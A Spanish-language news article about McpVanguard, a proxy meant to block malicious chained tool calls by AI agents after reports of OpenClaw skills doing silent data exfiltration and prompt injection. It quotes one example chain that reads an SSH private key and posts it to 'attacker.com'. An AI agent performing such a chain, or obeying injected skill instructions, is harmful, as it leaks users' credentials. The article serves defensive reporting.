McpVanguard Proxy Bloquea la Exfiltración de Datos de Habilidad OpenClaw

En respuesta al descubrimiento del equipo de seguridad de IA de Cisco de que habilidades de terceros de OpenClaw realizaban exfiltración de datos silenciosa e inyección de prompts, un desarrollador ha lanzado McpVanguard, un proxy diseñado para situarse entre un agente de IA y sus herramientas para bloquear llamadas maliciosas antes de que se ejecuten.
El problema: Llamadas maliciosas encadenadas
El problema de seguridad no es un error en OpenClaw en sí, sino una consecuencia de que los agentes tengan acceso al sistema de archivos, ejecución de shell y llamadas de red sin límites de aplicación. Las pruebas de Cisco revelaron un patrón en el que llamadas individuales aparentemente inocentes se combinan para crear una brecha, como:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Ninguna de las llamadas parece maliciosa de forma aislada, pero juntas exfiltran datos sensibles. Según la fuente, ClawHub tuvo más de 820 habilidades maliciosas en su punto máximo, y CVE-2026-25253 permitió a los atacantes lograr ejecución remota de código a través de un solo enlace malicioso. La validación actual a nivel de habilidad no logra detectar estas secuencias de llamadas encadenadas.
La solución: Proxy McpVanguard
McpVanguard aborda esto interceptando llamadas entre el agente y sus herramientas. Utiliza tres métodos de detección:
- Coincidencia de patrones
- Puntuación de intención semántica
- Detección de cadenas de comportamiento a lo largo de toda la sesión
La instalación es mediante pip: pip install mcp-vanguard.
Capa más profunda: Protocolo VEX
El proyecto incluye una capa de seguridad más profunda llamada Protocolo VEX, descrita como un sistema de "grabadora de vuelo". Proporciona:
- Registros de auditoría Merkle para registro a prueba de manipulaciones
- Verificación de identidad del agente basada en TPM
- Aplicación a nivel de llamadas al sistema
El Protocolo VEX está construido en Rust y su desarrollo comenzó en diciembre de 2023, antes de que OpenClaw ganara popularidad generalizada. La fuente señala que NVIDIA ha lanzado recientemente NemoClaw para propósitos de seguridad similares, lo que indica que este tipo de amenaza no va a desaparecer.
Ambos proyectos están disponibles en GitHub:
📖 Read the full source: r/openclaw
👀 Ver también

Ciberdelincuentes se resisten a la porquería generada por IA en foros clandestinos
Una nueva investigación muestra que hackers y estafadores de bajo nivel se quejan de publicaciones generadas por IA en foros de ciberdelincuencia, considerándolas ruido de baja calidad que socava la confianza comunitaria y la interacción social.

BlindKey: Inyección de Credenciales Ciegas para Agentes de IA
BlindKey es una herramienta de seguridad que evita que los agentes de IA accedan a credenciales de API en texto plano mediante el uso de tokens de bóveda cifrados y un proxy local. Los agentes hacen referencia a tokens como bk://stripe, y el proxy inyecta la credencial real en el momento de la solicitud.

Seguridad de Agentes de IA: Más Allá de los Jailbreaks Hasta el Mal Uso de Herramientas y la Inyección de Prompts
Los agentes de IA que navegan por la web, ejecutan comandos y activan flujos de trabajo enfrentan riesgos de seguridad por inyección de instrucciones y mal uso de herramientas, donde contenido no confiable redirige herramientas legítimas como la ejecución de comandos y solicitudes HTTP.

Preocupaciones de Seguridad en OpenClaw: Claves API y Datos de Conversación en Riesgo en la Autohospedaje por Defecto
Un informe de Cisco indica que la seguridad de OpenClaw es "opcional, no integrada", con configuraciones predeterminadas que almacenan claves API en archivos .env en instancias VPS, creando una posible exposición para usuarios no técnicos que ejecutan en droplets básicos.